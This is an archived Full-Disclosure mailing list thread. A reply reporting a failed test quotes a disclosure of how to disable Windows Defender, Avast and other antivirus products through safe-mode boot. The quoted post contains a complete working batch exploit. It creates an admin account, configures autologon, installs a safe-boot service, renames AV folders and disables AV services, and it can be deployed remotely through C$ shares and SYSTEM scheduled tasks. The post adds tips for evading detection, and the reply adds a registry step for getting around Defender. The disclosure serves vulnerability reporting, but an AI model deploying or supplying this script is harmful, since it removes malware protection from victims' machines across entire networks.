| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <dcb5287f-4235-c2fd-4daa-7e0a5a8a91da@211mainstreet.net>
Date: Wed, 9 Dec 2020 06:35:49 -0500
From: edwin@...mainstreet.net
To: fulldisclosure@...lists.org
Subject: Re: [FD] Disable Windows Defender and most other 3rd party
antiviruses
I tested your POC on Windows 10 home, build 1904, and it failed to disable Windows Defender. Windows Defender still loads in safe mode, so renaming the
"C:\Program Files (x86)\Windows Defender" folder fails because an executable in the folder is running. To disable Windows Defender, you need to boot into safe mode, rename the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend registry key so that Defender is not loaded at next safe boot, then reboot into safe mode again, where you can rename the folder.
I rather hope Microsoft doesn't change this because I have been seeking ways to disable Defender for a long time. It is the worst antivirus tool, guzzles battery,
slows my rather fast system to a crawl. I actually agree with Microsoft that this isn't a real security risk, given that it needs administrative privileges to start, and
that it requires such an obvious reboot into safe mode.
On 12/6/2020 9:00 PM, Roberto Franceschetti wrote:
> Windows Defender and most other antivirus applications can be disabled by booting into safe mode and renaming their application directories before their AV services are started in Windows. The renaming of the directories can be performed by creating a Windows NT Service that is allowed to start in Safe Mode. While Windows stops most non-Windows, non-critical services from starting when booting in Safe mode, I was able to make sure that my service is started by adding it to:
> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\[service name]
>
> I have successfully tested POCs on fully patched Windows 10 and Windows Server 2016 machines. In all cases I was able to disable the following antivirus products, even if they each had their flavor of password/tamper protection enabled:
> Windows Defender
> Avast
> Kaspersky
> F-Secure
> Bitdefender
> [one more product goes here, but as that vendor recognized the issue and has worked on a fix I will not mention it]
>
> The POC consists of a single .bat file that can be used to either disable the antivirus on the local machine, or one running on a remote endpoint.
>
> Disclosure: Local admin rights are needed on the victim's PC (very common for home users). For a remote exploit, this POC additionally requires the attacker to have access to the remote C$ share and to be able to schedule tasks remotely. Note that this however is a common scenario for IT tech support staff - if just one of them is tricked into executing the exploit, this could cause all AV protection on all Windows endpoints in the corporate network to be disabled.
>
> A sample exploit to disable both Windows Defender and Avast can be found below. The code is self-explanatory. On:
> https://logsat.com/WindowsAVBypass/
>
> you can find more details as to why I'm releasing this publicly, along with an additional POC sample that is used to disable Bitdefender. Bitdefender detects the original POC as malicious, but all that is needed to bypass that AV is to split each command in a separate scheduled task. Please note that some A/V might now detect this specific code as malicious, but what matters is the methodology that allows to disable the AVs - the steps can be performed in several different ways to go undetected.
>
> A screencast showing the POC remotely disabling Avast and Windows Defender is at: https://youtu.be/VE3gwXt6uWg
>
> Roberto Franceschetti
> LogSat Software
>
>
> ============= Avast-DisableAV-Remote.bat ================================
>
> REM - Author: Roberto Franceschetti
> REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat
> REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)
>
> IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)
>
> :Remote
> rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
> COPY "%~dp0Avast-DisableAV-Remote.bat" \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
> powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
> GOTO :eof
>
> :Local
> rem - We are running .bat locally - run the exploit
> rem - create local admin account used to autologin on first safe boot
> net user AvastBounty "Avast123" /ADD
> net localgroup administrators AvastBounty /add
>
> rem - add autologin registry entries for next reboot
> powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }"
> c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123
>
> rem - Now configure the next reboot in safe mode and autologin
> bcdedit /set {default} safeboot minimal
>
> rem - create the batch file executed by the DisableAvast service after the safe reboot
> rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable WinDefender
> rem - will remove the safebot/autologon entries and reboot
>
> @echo off
> echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
>
> echo sc config "avast! Antivirus" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "avast! Tools" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "AvastWscReporter" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "aswbIDSAgent" start=disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config WinDefend start=disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
> echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast" Avast_Disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
> echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableAvastAV.bat
> echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
> rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
> echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat
>
> rem - now create the Powershell script that will create a "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch file above:
> rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start
>
> echo $source = @^" > c:\windows\temp\CreateService.ps1
> echo using System; >> c:\windows\temp\CreateService.ps1
> echo class Hello { >> c:\windows\temp\CreateService.ps1
> echo static void Main() { >> c:\windows\temp\CreateService.ps1
> echo System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); >> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo ^"@ >> c:\windows\temp\CreateService.ps1
> echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
>
> @echo on
>
> rem - now execute the powershell script to create the DisableAvastAV.exe file and install it as a service:
> powershell set-executionpolicy -executionpolicy bypass
> powershell c:\windows\temp\CreateService.ps1
> sc create DisableAvast binpath="c:\windows\temp\DisableAvastAV.exe" start=auto
>
> rem - this entry will allow the DisableAvast service to run in Safeboot as well, otherwise it won't start:
> reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast /f /t REG_SZ /d "service"
>
> rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe service will run, calling the DisableAvastAV.bat script, renaming the Avast folders no longer protected by Tamper Protection
> rem - pause
> shutdown /r /f /t 0
>
> =============================================
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists